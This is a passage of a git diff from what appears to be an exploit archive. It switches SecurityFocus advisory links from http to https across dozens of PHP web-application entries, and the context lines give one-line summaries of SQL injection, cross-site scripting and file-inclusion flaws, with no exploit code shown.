http://www.securityfocus.com/bid/16125/info +source: https://www.securityfocus.com/bid/16125/info Primo Cart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27027.txt b/exploits/php/webapps/27027.txt index 8e45b872b..4acd8d2b4 100644 --- a/exploits/php/webapps/27027.txt +++ b/exploits/php/webapps/27027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16130/info +source: https://www.securityfocus.com/bid/16130/info Jax Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27028.txt b/exploits/php/webapps/27028.txt index af91ad6d1..03deddb5f 100644 --- a/exploits/php/webapps/27028.txt +++ b/exploits/php/webapps/27028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16132/info +source: https://www.securityfocus.com/bid/16132/info LogicBill is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27029.txt b/exploits/php/webapps/27029.txt index 1b86c3b3b..ae0c49bdd 100644 --- a/exploits/php/webapps/27029.txt +++ b/exploits/php/webapps/27029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16133/info +source: https://www.securityfocus.com/bid/16133/info EZI is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27030.txt b/exploits/php/webapps/27030.txt index 61f4a84fb..0a43bebef 100644 --- a/exploits/php/webapps/27030.txt +++ b/exploits/php/webapps/27030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16134/info +source: https://www.securityfocus.com/bid/16134/info CS-Cart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27033.txt b/exploits/php/webapps/27033.txt index b8d48f741..e6783aab6 100644 --- a/exploits/php/webapps/27033.txt +++ b/exploits/php/webapps/27033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16154/info +source: https://www.securityfocus.com/bid/16154/info Foro Domus is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27037.txt b/exploits/php/webapps/27037.txt index 2d950b8a3..a5846ed4c 100644 --- a/exploits/php/webapps/27037.txt +++ b/exploits/php/webapps/27037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16161/info +source: https://www.securityfocus.com/bid/16161/info TheWebForum is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27038.txt b/exploits/php/webapps/27038.txt index bb8cafea9..fa1b45896 100644 --- a/exploits/php/webapps/27038.txt +++ b/exploits/php/webapps/27038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16163/info +source: https://www.securityfocus.com/bid/16163/info TinyPHPForum is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27048.txt b/exploits/php/webapps/27048.txt index fdc38aab4..ed3315e34 100644 --- a/exploits/php/webapps/27048.txt +++ b/exploits/php/webapps/27048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16166/info +source: https://www.securityfocus.com/bid/16166/info AppServ Open Project is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27052.txt b/exploits/php/webapps/27052.txt index 5e262e20d..064ea2fca 100644 --- a/exploits/php/webapps/27052.txt +++ b/exploits/php/webapps/27052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16169/info +source: https://www.securityfocus.com/bid/16169/info 427BB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27053.txt b/exploits/php/webapps/27053.txt index 478b050bd..4a54da31d 100644 --- a/exploits/php/webapps/27053.txt +++ b/exploits/php/webapps/27053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16176/info +source: https://www.securityfocus.com/bid/16176/info Venom Board is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27054.txt b/exploits/php/webapps/27054.txt index 0bf3998b6..e59fb8ca7 100644 --- a/exploits/php/webapps/27054.txt +++ b/exploits/php/webapps/27054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16178/info +source: https://www.securityfocus.com/bid/16178/info 427BB is prone to an authentication bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. diff --git a/exploits/php/webapps/27058.txt b/exploits/php/webapps/27058.txt index 96f202fc4..88ce8a254 100644 --- a/exploits/php/webapps/27058.txt +++ b/exploits/php/webapps/27058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16186/info +source: https://www.securityfocus.com/bid/16186/info PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27059.txt b/exploits/php/webapps/27059.txt index f35b72833..453d566b9 100644 --- a/exploits/php/webapps/27059.txt +++ b/exploits/php/webapps/27059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16189/info +source: https://www.securityfocus.com/bid/16189/info The XOOPS Pool Module is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27060.txt b/exploits/php/webapps/27060.txt index 21370e912..0c54485a5 100644 --- a/exploits/php/webapps/27060.txt +++ b/exploits/php/webapps/27060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16192/info +source: https://www.securityfocus.com/bid/16192/info The PHPNuke Pool and News Modules are prone to an HTML injection vulnerability. This issue is due to a failure in the application modules to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27064.txt b/exploits/php/webapps/27064.txt index 636203ab2..ead80c983 100644 --- a/exploits/php/webapps/27064.txt +++ b/exploits/php/webapps/27064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16199/info +source: https://www.securityfocus.com/bid/16199/info Orjinweb is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27067.txt b/exploits/php/webapps/27067.txt index 39524c3aa..472278f1f 100644 --- a/exploits/php/webapps/27067.txt +++ b/exploits/php/webapps/27067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16210/info +source: https://www.securityfocus.com/bid/16210/info MyPhPim is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27068.txt b/exploits/php/webapps/27068.txt index 09eebae4b..140dc437a 100644 --- a/exploits/php/webapps/27068.txt +++ b/exploits/php/webapps/27068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16210/info +source: https://www.securityfocus.com/bid/16210/info MyPhPim is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27070.txt b/exploits/php/webapps/27070.txt index 419327255..cf15d729b 100644 --- a/exploits/php/webapps/27070.txt +++ b/exploits/php/webapps/27070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16214/info +source: https://www.securityfocus.com/bid/16214/info TrackPoint NX is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27075.txt b/exploits/php/webapps/27075.txt index 838b4a4aa..84413ac65 100644 --- a/exploits/php/webapps/27075.txt +++ b/exploits/php/webapps/27075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16228/info +source: https://www.securityfocus.com/bid/16228/info TankLogger is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27077.txt b/exploits/php/webapps/27077.txt index eb9edf416..3815c519c 100644 --- a/exploits/php/webapps/27077.txt +++ b/exploits/php/webapps/27077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16232/info +source: https://www.securityfocus.com/bid/16232/info DCP Portal is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27078.txt b/exploits/php/webapps/27078.txt index b29d11624..6ce1f703a 100644 --- a/exploits/php/webapps/27078.txt +++ b/exploits/php/webapps/27078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16233/info +source: https://www.securityfocus.com/bid/16233/info Template Seller Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27080.txt b/exploits/php/webapps/27080.txt index 6e97e80f9..a7c5cec6e 100644 --- a/exploits/php/webapps/27080.txt +++ b/exploits/php/webapps/27080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16237/info +source: https://www.securityfocus.com/bid/16237/info ezDatabase is prone to a remote PHP script code execution vulnerability. diff --git a/exploits/php/webapps/27084.txt b/exploits/php/webapps/27084.txt index 53345e5e0..95f1f61bf 100644 --- a/exploits/php/webapps/27084.txt +++ b/exploits/php/webapps/27084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16244/info +source: https://www.securityfocus.com/bid/16244/info Bit 5 Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27085.txt b/exploits/php/webapps/27085.txt index 19fb25b3f..bd092f854 100644 --- a/exploits/php/webapps/27085.txt +++ b/exploits/php/webapps/27085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16246/info +source: https://www.securityfocus.com/bid/16246/info Bit 5 Blog is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27086.txt b/exploits/php/webapps/27086.txt index 23f2347ed..1474c3124 100644 --- a/exploits/php/webapps/27086.txt +++ b/exploits/php/webapps/27086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16247/info +source: https://www.securityfocus.com/bid/16247/info White Album is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27087.txt b/exploits/php/webapps/27087.txt index daa50425f..bde3a736f 100644 --- a/exploits/php/webapps/27087.txt +++ b/exploits/php/webapps/27087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16249/info +source: https://www.securityfocus.com/bid/16249/info geoBlog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27092.txt b/exploits/php/webapps/27092.txt index a9b6753b0..5f3c9920c 100644 --- a/exploits/php/webapps/27092.txt +++ b/exploits/php/webapps/27092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16255/info +source: https://www.securityfocus.com/bid/16255/info GTP iCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/27093.txt b/exploits/php/webapps/27093.txt index c63af5c6b..cf61bc73e 100644 --- a/exploits/php/webapps/27093.txt +++ b/exploits/php/webapps/27093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16257/info +source: https://www.securityfocus.com/bid/16257/info EZDatabase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27097.txt b/exploits/php/webapps/27097.txt index b23cfcad5..54dbb1716 100644 --- a/exploits/php/webapps/27097.txt +++ b/exploits/php/webapps/27097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16263/info +source: https://www.securityfocus.com/bid/16263/info phpXplorer is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27098.txt b/exploits/php/webapps/27098.txt index dfebd618d..f5bf7ca35 100644 --- a/exploits/php/webapps/27098.txt +++ b/exploits/php/webapps/27098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16266/info +source: https://www.securityfocus.com/bid/16266/info Referrer Tracker is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27099.txt b/exploits/php/webapps/27099.txt index aca0763d7..6589cf910 100644 --- a/exploits/php/webapps/27099.txt +++ b/exploits/php/webapps/27099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16269/info +source: https://www.securityfocus.com/bid/16269/info BlogPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27100.txt b/exploits/php/webapps/27100.txt index 24f634d67..3c9c21315 100644 --- a/exploits/php/webapps/27100.txt +++ b/exploits/php/webapps/27100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16270/info +source: https://www.securityfocus.com/bid/16270/info microBlog is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27102.txt b/exploits/php/webapps/27102.txt index 9dec24014..2809a2989 100644 --- a/exploits/php/webapps/27102.txt +++ b/exploits/php/webapps/27102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16279/info +source: https://www.securityfocus.com/bid/16279/info PowerPortal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27103.txt b/exploits/php/webapps/27103.txt index a82c0dc1d..d15a4b374 100644 --- a/exploits/php/webapps/27103.txt +++ b/exploits/php/webapps/27103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16279/info +source: https://www.securityfocus.com/bid/16279/info PowerPortal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27104.txt b/exploits/php/webapps/27104.txt index dc93083c7..d558d3675 100644 --- a/exploits/php/webapps/27104.txt +++ b/exploits/php/webapps/27104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16286/info +source: https://www.securityfocus.com/bid/16286/info AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27105.txt b/exploits/php/webapps/27105.txt index b5634e3e7..58f330486 100644 --- a/exploits/php/webapps/27105.txt +++ b/exploits/php/webapps/27105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16286/info +source: https://www.securityfocus.com/bid/16286/info AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27106.txt b/exploits/php/webapps/27106.txt index de526b11d..b661965f2 100644 --- a/exploits/php/webapps/27106.txt +++ b/exploits/php/webapps/27106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16286/info +source: https://www.securityfocus.com/bid/16286/info AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27107.txt b/exploits/php/webapps/27107.txt index 8a83e312f..2cc2071e6 100644 --- a/exploits/php/webapps/27107.txt +++ b/exploits/php/webapps/27107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16292/info +source: https://www.securityfocus.com/bid/16292/info phpXplorer is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27109.txt b/exploits/php/webapps/27109.txt index be6bc6172..34972f36c 100644 --- a/exploits/php/webapps/27109.txt +++ b/exploits/php/webapps/27109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16300/info +source: https://www.securityfocus.com/bid/16300/info Phpclanwebsite is prone to a script-injection vulnerability. diff --git a/exploits/php/webapps/27110.txt b/exploits/php/webapps/27110.txt index 44f62995d..e42b10628 100644 --- a/exploits/php/webapps/27110.txt +++ b/exploits/php/webapps/27110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16305/info +source: https://www.securityfocus.com/bid/16305/info Eggblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27111.txt b/exploits/php/webapps/27111.txt index 827c01d7d..f129db85c 100644 --- a/exploits/php/webapps/27111.txt +++ b/exploits/php/webapps/27111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16305/info +source: https://www.securityfocus.com/bid/16305/info Eggblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27112.txt b/exploits/php/webapps/27112.txt index 86077e104..09d2275e9 100644 --- a/exploits/php/webapps/27112.txt +++ b/exploits/php/webapps/27112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16306/info +source: https://www.securityfocus.com/bid/16306/info saralblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27114.txt b/exploits/php/webapps/27114.txt index cb22e8409..0f22db0b6 100644 --- a/exploits/php/webapps/27114.txt +++ b/exploits/php/webapps/27114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16319/info +source: https://www.securityfocus.com/bid/16319/info WebspotBlogging is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27116.txt b/exploits/php/webapps/27116.txt index 2fdac8506..a6966bab6 100644 --- a/exploits/php/webapps/27116.txt +++ b/exploits/php/webapps/27116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16339/info +source: https://www.securityfocus.com/bid/16339/info NewsPHP is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27117.txt b/exploits/php/webapps/27117.txt index 2c1370ca8..a9e5e9e7a 100644 --- a/exploits/php/webapps/27117.txt +++ b/exploits/php/webapps/27117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16340/info +source: https://www.securityfocus.com/bid/16340/info BlogPHP is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27118.pl b/exploits/php/webapps/27118.pl index 188de6dbc..46393f820 100755 --- a/exploits/php/webapps/27118.pl +++ b/exploits/php/webapps/27118.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16342/info +source: https://www.securityfocus.com/bid/16342/info RCBlog is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27119.txt b/exploits/php/webapps/27119.txt index f9438ad35..1eb7a15db 100644 --- a/exploits/php/webapps/27119.txt +++ b/exploits/php/webapps/27119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16344/info +source: https://www.securityfocus.com/bid/16344/info The e-moBLOG application is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27120.txt b/exploits/php/webapps/27120.txt index 491dcc754..2883e9b18 100644 --- a/exploits/php/webapps/27120.txt +++ b/exploits/php/webapps/27120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16351/info +source: https://www.securityfocus.com/bid/16351/info AZbb is prone to HTML-injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27121.txt b/exploits/php/webapps/27121.txt index 42437f3be..257262d13 100644 --- a/exploits/php/webapps/27121.txt +++ b/exploits/php/webapps/27121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16360/info +source: https://www.securityfocus.com/bid/16360/info 123 Flash Chat is prone to an arbitrary code injection weakness. diff --git a/exploits/php/webapps/27122.txt b/exploits/php/webapps/27122.txt index 12791302d..09066d23c 100644 --- a/exploits/php/webapps/27122.txt +++ b/exploits/php/webapps/27122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16361/info +source: https://www.securityfocus.com/bid/16361/info MyBB is prone to an HTML-injection vulnerability. This issue is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27123.txt b/exploits/php/webapps/27123.txt index 164ee0b2e..bb89454be 100644 --- a/exploits/php/webapps/27123.txt +++ b/exploits/php/webapps/27123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16362/info +source: https://www.securityfocus.com/bid/16362/info Pixelpost is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27124.txt b/exploits/php/webapps/27124.txt index d74209dff..8de26fa11 100644 --- a/exploits/php/webapps/27124.txt +++ b/exploits/php/webapps/27124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16363/info +source: https://www.securityfocus.com/bid/16363/info SleeperChat is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27125.txt b/exploits/php/webapps/27125.txt index 18b285deb..2aa40e561 100644 --- a/exploits/php/webapps/27125.txt +++ b/exploits/php/webapps/27125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16367/info +source: https://www.securityfocus.com/bid/16367/info miniBloggie is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27126.txt b/exploits/php/webapps/27126.txt index e4527759b..23a907ecb 100644 --- a/exploits/php/webapps/27126.txt +++ b/exploits/php/webapps/27126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16376/info +source: https://www.securityfocus.com/bid/16376/info CheesyBlog is prone to multiple HTML injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27127.txt b/exploits/php/webapps/27127.txt index 17f67d6f2..bf45a0d2e 100644 --- a/exploits/php/webapps/27127.txt +++ b/exploits/php/webapps/27127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16377/info +source: https://www.securityfocus.com/bid/16377/info ExpressionEngine is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to HTTP 'Referer' header before using it in dynamically generated content. diff --git a/exploits/php/webapps/27137.txt b/exploits/php/webapps/27137.txt index ad4b40385..e702b05c5 100644 --- a/exploits/php/webapps/27137.txt +++ b/exploits/php/webapps/27137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16387/info +source: https://www.securityfocus.com/bid/16387/info MyBB is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27138.txt b/exploits/php/webapps/27138.txt index d8d6344a7..3ecadf4b4 100644 --- a/exploits/php/webapps/27138.txt +++ b/exploits/php/webapps/27138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16393/info +source: https://www.securityfocus.com/bid/16393/info AndoNET Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27139.txt b/exploits/php/webapps/27139.txt index 5fee8ded2..8e68715b5 100644 --- a/exploits/php/webapps/27139.txt +++ b/exploits/php/webapps/27139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16395/info +source: https://www.securityfocus.com/bid/16395/info My Little Homepage Web log, guestbook, and forum are prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27146.txt b/exploits/php/webapps/27146.txt index 517088a70..a1ded7a59 100644 --- a/exploits/php/webapps/27146.txt +++ b/exploits/php/webapps/27146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16412/info +source: https://www.securityfocus.com/bid/16412/info sPaiz-Nuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27147.txt b/exploits/php/webapps/27147.txt index 9817511a0..2becaf8fd 100644 --- a/exploits/php/webapps/27147.txt +++ b/exploits/php/webapps/27147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16421/info +source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27149.txt b/exploits/php/webapps/27149.txt index bbd9d72da..932bddb4e 100644 --- a/exploits/php/webapps/27149.txt +++ b/exploits/php/webapps/27149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16426/info +source: https://www.securityfocus.com/bid/16426/info Ashnews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27153.txt b/exploits/php/webapps/27153.txt index ef42ae0de..549e2ed5d 100644 --- a/exploits/php/webapps/27153.txt +++ b/exploits/php/webapps/27153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16439/info +source: https://www.securityfocus.com/bid/16439/info Cerberus Helpdesk is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27154.txt b/exploits/php/webapps/27154.txt index dc12ea0cf..b0589a6ef 100644 --- a/exploits/php/webapps/27154.txt +++ b/exploits/php/webapps/27154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16440/info +source: https://www.securityfocus.com/bid/16440/info FarsiNews is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27155.txt b/exploits/php/webapps/27155.txt index b4c8633c2..568c2b577 100644 --- a/exploits/php/webapps/27155.txt +++ b/exploits/php/webapps/27155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16443/info +source: https://www.securityfocus.com/bid/16443/info MyBB is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/27156.txt b/exploits/php/webapps/27156.txt index 8561767c8..a1d6e3dba 100644 --- a/exploits/php/webapps/27156.txt +++ b/exploits/php/webapps/27156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16454/info +source: https://www.securityfocus.com/bid/16454/info SZUserMgnt is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27157.txt b/exploits/php/webapps/27157.txt index d3218dbca..6bfe2dcac 100644 --- a/exploits/php/webapps/27157.txt +++ b/exploits/php/webapps/27157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16458/info +source: https://www.securityfocus.com/bid/16458/info SPIP is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27158.txt b/exploits/php/webapps/27158.txt index ac348a015..ae025a52f 100644 --- a/exploits/php/webapps/27158.txt +++ b/exploits/php/webapps/27158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16461/info +source: https://www.securityfocus.com/bid/16461/info SPIP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27162.txt b/exploits/php/webapps/27162.txt index d41423f9d..72ece9b94 100644 --- a/exploits/php/webapps/27162.txt +++ b/exploits/php/webapps/27162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16482/info +source: https://www.securityfocus.com/bid/16482/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27164.txt b/exploits/php/webapps/27164.txt index 8821828d6..6e06e037a 100644 --- a/exploits/php/webapps/27164.txt +++ b/exploits/php/webapps/27164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16520/info +source: https://www.securityfocus.com/bid/16520/info UBB.Threads is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27165.txt b/exploits/php/webapps/27165.txt index 70134d51e..bce219fda 100644 --- a/exploits/php/webapps/27165.txt +++ b/exploits/php/webapps/27165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16521/info +source: https://www.securityfocus.com/bid/16521/info Beehive Forum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27166.txt b/exploits/php/webapps/27166.txt index c5d63580c..260acef45 100644 --- a/exploits/php/webapps/27166.txt +++ b/exploits/php/webapps/27166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16537/info +source: https://www.securityfocus.com/bid/16537/info The eyeOS system is prone to a remote command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data. diff --git a/exploits/php/webapps/27167.txt b/exploits/php/webapps/27167.txt index cd0585951..0d5d0687f 100644 --- a/exploits/php/webapps/27167.txt +++ b/exploits/php/webapps/27167.txt @@ -1,4 +1,4 @@ -source: 